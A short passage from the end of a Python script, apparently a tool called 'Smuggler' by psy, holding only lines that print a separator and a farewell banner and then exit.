  687. print("\n"+"-"*45+"\n")
  688. print("[Smuggler by psy (https://03c8.net)]\n\n Bye! ;-)\n")
  689. sys.exit()